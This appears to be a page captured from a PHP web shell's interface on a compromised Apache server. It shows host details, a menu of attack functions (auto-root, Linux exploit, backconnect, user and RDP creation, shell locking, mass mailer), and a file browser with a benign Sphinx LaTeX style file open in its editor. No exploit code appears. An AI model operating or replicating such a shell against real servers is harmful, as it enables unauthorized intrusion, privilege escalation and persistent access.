Linux iad1-shared-b7-18 6.6.49-grsec-jammy+ #10 SMP Thu Sep 12 23:23:08 UTC 2024 x86_64
Apache
: 67.205.6.31 | : 216.73.216.47
Cant Read [ /etc/named.conf ]
8.2.29
fernandoquevedo
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
share /
sphinx /
texinputs /
[ HOME SHELL ]
Name
Size
Permission
Action
LICRcyr2utf8.xdy
4.26
KB
-rw-r--r--
LICRlatin2utf8.xdy
9.95
KB
-rw-r--r--
LatinRules.xdy
18.25
KB
-rw-r--r--
Makefile_t
2.34
KB
-rw-r--r--
latexmkjarc_t
695
B
-rw-r--r--
latexmkrc_t
1.08
KB
-rw-r--r--
make.bat_t
1.02
KB
-rw-r--r--
python.ist
392
B
-rw-r--r--
sphinx.sty
12.95
KB
-rw-r--r--
sphinx.xdy
9.25
KB
-rw-r--r--
sphinxhowto.cls
3.18
KB
-rw-r--r--
sphinxlatexadmonitions.sty
6.09
KB
-rw-r--r--
sphinxlatexcontainers.sty
901
B
-rw-r--r--
sphinxlatexgraphics.sty
4.73
KB
-rw-r--r--
sphinxlatexindbibtoc.sty
2.02
KB
-rw-r--r--
sphinxlatexlists.sty
3.46
KB
-rw-r--r--
sphinxlatexliterals.sty
34.32
KB
-rw-r--r--
sphinxlatexnumfig.sty
4.43
KB
-rw-r--r--
sphinxlatexobjects.sty
7.1
KB
-rw-r--r--
sphinxlatexshadowbox.sty
3.79
KB
-rw-r--r--
sphinxlatexstyleheadings.sty
3.18
KB
-rw-r--r--
sphinxlatexstylepage.sty
2.99
KB
-rw-r--r--
sphinxlatexstyletext.sty
5.64
KB
-rw-r--r--
sphinxlatextables.sty
21.34
KB
-rw-r--r--
sphinxmanual.cls
4.14
KB
-rw-r--r--
sphinxoptionsgeometry.sty
2.01
KB
-rw-r--r--
sphinxoptionshyperref.sty
1.07
KB
-rw-r--r--
sphinxpackagecyrillic.sty
2.53
KB
-rw-r--r--
sphinxpackagefootnote.sty
12.94
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : sphinxlatexstylepage.sty
%% PAGE STYLING % % change this info string if making any custom modification \ProvidesFile{sphinxlatexstylepage.sty}[2021/01/27 page styling] % Separate paragraphs by space by default. \IfFileExists{parskip-2001-04-09.sty}% since September 2018 TeXLive update % new parskip.sty, but let it rollback to old one. % hopefully TeX installation not broken and LaTeX kernel not too old {\RequirePackage{parskip}[=v1]} % standard one from 1989. Admittedly \section of article/book gives possibly % anomalous spacing, but we can't require September 2018 release for some time. {\RequirePackage{parskip}} % Style parameters and macros used by most documents here \raggedbottom \sloppy \hbadness = 5000 % don't print trivial gripes % Require package fancyhdr except under memoir class \@ifclassloaded{memoir}{}{\RequirePackage{fancyhdr}} % Use \pagestyle{normal} as the primary pagestyle for text. % Redefine the 'normal' header/footer style when using "fancyhdr" package: \@ifpackageloaded{fancyhdr}{% \ltx@ifundefined{c@chapter} {% no \chapter, "howto" (non-Japanese) docclass \fancypagestyle{plain}{ \fancyhf{} \fancyfoot[C]{{\py@HeaderFamily\thepage}} \renewcommand{\headrulewidth}{0pt} \renewcommand{\footrulewidth}{0pt} } % Same as 'plain', this way we can use it in template % FIXME: shouldn't this have a running header with Name and Release like 'manual'? \fancypagestyle{normal}{ \fancyhf{} \fancyfoot[C]{{\py@HeaderFamily\thepage}} \renewcommand{\headrulewidth}{0pt} \renewcommand{\footrulewidth}{0pt} } }% {% classes with \chapter command \fancypagestyle{normal}{ \fancyhf{} \fancyfoot[RO]{{\py@HeaderFamily\thepage}} \fancyfoot[LO]{{\py@HeaderFamily\nouppercase{\rightmark}}} \fancyhead[RO]{{\py@HeaderFamily \@title\sphinxheadercomma\py@release}} \if@twoside \fancyfoot[LE]{{\py@HeaderFamily\thepage}} \fancyfoot[RE]{{\py@HeaderFamily\nouppercase{\leftmark}}} \fancyhead[LE]{{\py@HeaderFamily \@title\sphinxheadercomma\py@release}} \fi \renewcommand{\headrulewidth}{0.4pt} \renewcommand{\footrulewidth}{0.4pt} % define chaptermark with \@chappos when \@chappos is available for Japanese \ltx@ifundefined{@chappos}{} {\def\chaptermark##1{\markboth{\@chapapp\space\thechapter\space\@chappos\space ##1}{}}} } % Update the plain style so we get the page number & footer line, % but not a chapter or section title. This is to keep the first % page of a chapter `clean.' \fancypagestyle{plain}{ \fancyhf{} \fancyfoot[RO]{{\py@HeaderFamily\thepage}} \if@twoside\fancyfoot[LE]{{\py@HeaderFamily\thepage}}\fi \renewcommand{\headrulewidth}{0pt} \renewcommand{\footrulewidth}{0.4pt} } } } {% no fancyhdr: memoir class % Provide default for 'normal' style simply as an alias of 'plain' style % This way we can use \pagestyle{normal} in LaTeX template \def\ps@normal{\ps@plain} % Users of memoir class are invited to redefine 'normal' style in preamble } \endinput
Close